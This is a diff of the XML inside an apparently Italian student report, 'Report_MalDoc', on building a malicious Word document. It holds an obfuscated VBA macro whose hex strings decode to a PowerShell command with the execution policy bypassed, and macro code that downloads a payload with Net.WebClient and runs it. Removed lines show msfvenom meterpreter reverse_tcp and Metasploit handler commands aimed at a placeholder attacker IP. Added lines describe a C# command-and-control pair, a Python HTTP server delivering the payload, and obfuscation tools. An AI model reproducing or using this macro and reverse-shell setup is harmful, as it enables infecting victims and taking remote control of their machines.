+        </w:rPr>
+        <w:t>tzicbtrtaod.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>twnukwpmlvzmxls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("706f77") &amp; twnukwpmlvzmxls("65727368656c6c2e657865202d4e6f50726f66696c65202d457865637574696f6e506f6c69637920427970617373202d436f6d6d616e6420") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>vmfosuiwtjww</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ehtsfjs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>, True</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titolo1"/>
-      </w:pPr>
-      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tzicbtrtaod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Il codice è</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stato offuscato con il seguente offuscatore: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>https://github.com/sevagas/macro_pack.git</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Il seguente programma genera un documento Word con la macro offuscata all’interno. Come input è necessario dare la macro non offuscata. (ho dato in input la macro direttamente coi comandi codificati in base 64)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titolo1"/>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
         <w:t>INFRASTRUTTURA ATTACCO</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -2155,237 +2505,58 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">, il software utilizzato per creare il server C2 è </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, è stato utilizzato il metodo visto a lezione, di seguito riporto </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> comandi:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>//creo il software malevolo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> da scaricare nella macchina della vittima</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfvenom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p windows/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> LHOST</w:t>
-      </w:r>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ipAttaccante</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> LPORT</w:t>
-      </w:r>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:t>porta -f exe &gt; payload.exe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>//</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>metto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>ascolto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> il server</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>use exploit/multi/</w:t>
-      </w:r>
+        <w:t>, ho scritto due programmi in C# che rappresentano rispettivamente il client e il server. La vittima aprendo il documento Word malevolo si collega ad un server creato con il comando “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>python</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -m </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>handler</w:t>
-      </w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>http.server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>set PAYLOAD windows/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>reverse_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">set </w:t>
-      </w:r>
-      <w:r>
-        <w:t>L</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">HOST </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ipAttaccante</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">set LPORT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>porta</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>// metto in ascolto un altro server per permettere di scaricare il payload malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 8000</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” e scarica il payload malevolo. L’attaccante avvierà poi la console ed inserirà come input l’indirizzo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> della vittima fornitogli dal server </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -2398,23 +2569,28 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -m </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>http.server</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 8000</w:t>
+        <w:t xml:space="preserve">. Il payload è stato offuscato usando il seguente software: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Collegamentoipertestuale"/>
+            <w:lang w:val="it-IT"/>
+          </w:rPr>
+          <w:t>https://github.com/0xb11a1/yetAnotherObfuscator.git</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> L’unico possibile “comando malevolo” che ho implementato è la scrittura di un messaggio da remoto usando il prompt della vittima.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3618,6 +3794,29 @@
       <w:outlineLvl w:val="9"/>
     </w:pPr>
   </w:style>
+  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004A1568"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Menzionenonrisolta">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004A1568"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -3917,12 +4116,7 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
 </file>
 
 <file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
@@ -3934,7 +4128,12 @@
 </file>
 
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
 <file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
@@ -4179,9 +4378,9 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>
@@ -4197,9 +4396,9 @@
 </file>
 
 <file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>

--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -225,7 +225,6 @@
         <w:t>Net.WebClient</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="it-IT"/>
@@ -240,7 +239,6 @@
         <w:t>DownloadFile</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="it-IT"/>
@@ -275,7 +273,31 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">percorso\dove\voglio\salvare\virus.exe </w:t>
+        <w:t>percorso\dove\voglio\salvare\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>zip</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -294,7 +316,19 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>comandoDaEseguire2= " &amp; 'percorso\dove\è\salvato\virus.exe'"</w:t>
+        <w:t>comandoDaEseguire2= " &amp; 'percorso\dove\è\salvato\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>.exe'"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -336,12 +370,10 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>shell.Run</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> "powershell.exe -</w:t>
       </w:r>
@@ -409,12 +441,10 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>shell.Run</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> "powershell.exe -</w:t>
       </w:r>
@@ -675,67 +705,262 @@
       <w:pPr>
         <w:rPr>
           <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>Crea</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> un </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>oggetto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> XML</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>' Crea un oggetto XML</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
         <w:t xml:space="preserve">    Set </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
         <w:t>objXML</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
         <w:t xml:space="preserve"> = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
         <w:t>CreateObject</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>("MSXML2.DOMDocument")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objXML.createElement</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("b64")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>' Imposta il testo del nodo con il comando da codificare</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>objNode.dataType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "bin.base64"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>objNode.nodeTypedValue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>stringaABinario</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>"MSXML2.DOMDocument")</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>str</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' Restituisci il risultato della codifica base64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    EncodeBase64 = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>objNode.text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' Libera l'oggetto XML</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = Nothing</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -744,7 +969,187 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>objNode</w:t>
+        <w:t>objXML</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">End </w:t>
